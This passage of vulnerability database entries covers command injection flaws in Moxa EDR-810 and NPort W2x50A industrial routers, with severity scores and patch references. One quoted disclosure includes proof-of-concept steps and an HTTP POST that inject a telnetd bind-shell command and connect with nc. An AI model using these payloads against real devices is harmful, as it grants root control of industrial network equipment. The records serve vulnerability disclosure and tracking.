"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11733",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105156",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-14434",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "VULHUB",
"id": "VHN-105156"
},
{
"db": "VULMON",
"id": "CVE-2017-14434"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"id": "VAR-201805-0139",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "VULHUB",
"id": "VHN-105156"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
}
]
},
"last_update_date": "2023-12-18T12:28:57.463000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Command Injection Vulnerability (CNVD-2018-11733)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132241"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190042"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105156"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0482"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14434"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14434"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0482"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141657"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "VULHUB",
"id": "VHN-105156"
},
{
"db": "VULMON",
"id": "CVE-2017-14434"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "VULHUB",
"id": "VHN-105156"
},
{
"db": "VULMON",
"id": "CVE-2017-14434"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105156"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14434"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"date": "2018-05-14T20:29:00.797000",
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-105156"
},
{
"date": "2018-06-15T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14434"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"date": "2022-12-09T02:07:43.277000",
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
],
"trust": 0.6
}
}
VAR-201805-0124
Vulnerability from variot - Updated: 2023-12-18 12:18An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the CN= parm in the "/goform/net_WebCSRGen" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is an industrial security router with firewall / NAT / VPN and managed layer 2 switches. It is designed for remotely controlling or monitoring Ethernet-based security applications in a network
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0124",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12125"
}
]
},
"cve": "CVE-2017-12125",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-12125",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-07865",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-102616",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12125",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12125",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12125",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-07865",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1628",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102616",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "VULHUB",
"id": "VHN-102616"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the CN= parm in the \"/goform/net_WebCSRGen\" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is an industrial security router with firewall / NAT / VPN and managed layer 2 switches. It is designed for remotely controlling or monitoring Ethernet-based security applications in a network",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "VULHUB",
"id": "VHN-102616"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0477",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-12125",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-07865",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97233",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102616",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "VULHUB",
"id": "VHN-102616"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"id": "VAR-201805-0124",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "VULHUB",
"id": "VHN-102616"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
}
]
},
"last_update_date": "2023-12-18T12:18:52.230000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for Moxa EDR-810 Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/126115"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190031"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102616"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0477"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12125"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12125"
},
{
"trust": 0.6,
"url": "https://securityaffairs.co/wordpress/71443/hacking/moxa-edr-810-flaws.html"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0477"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "VULHUB",
"id": "VHN-102616"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "VULHUB",
"id": "VHN-102616"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-04-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102616"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"date": "2018-05-14T20:29:00.407000",
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-04-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102616"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013411"
},
{
"date": "2022-12-09T01:51:49.107000",
"db": "NVD",
"id": "CVE-2017-12125"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Command Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-07865"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1628"
}
],
"trust": 0.6
}
}
VAR-201805-0120
Vulnerability from variot - Updated: 2023-12-18 12:18An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the "/goform/net_WebPingGetValue" URI to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa. Moxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS Command Injection vulnerabilities:
1 Authenticated OS Command Injection in web server ping functionality
Reserverd CVE ID: CVE-2018-19659
A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. Exploitation required authentication. This is similar to CVE-2017-12120.
Proof-of-concept: 1. Authenticate to Moxa NPort W2x50A device. 2. Go to Main menu a System Management a Maintenance a Ping a Destination 3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field 4. Connect to opened bind shell: nc $IP_ADDRESS 4444
#2 Authenticated OS Command Injection in web server wlan profile properties functionality
Reserverd CVE ID: CVE-2018-19660
A specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the root user. Exploitation required authentication.
Proof-of-concept (sample HTTP request opening bind shell on port 4444):
POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1 Host: {IP:PORT} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: SessionID={YOURSESSIONID} Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 309
Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&;
These vulnerabilities were fixed in the firmware version 2.2 Build_18082311. https://www.moxa.com/support/download.aspx?type=support&id=14781
Best regards, Maksim Khazov
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0120",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11722"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013408"
},
{
"db": "NVD",
"id": "CVE-2017-12120"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1633"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12120"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Maxim Khazov",
"sources": [
{
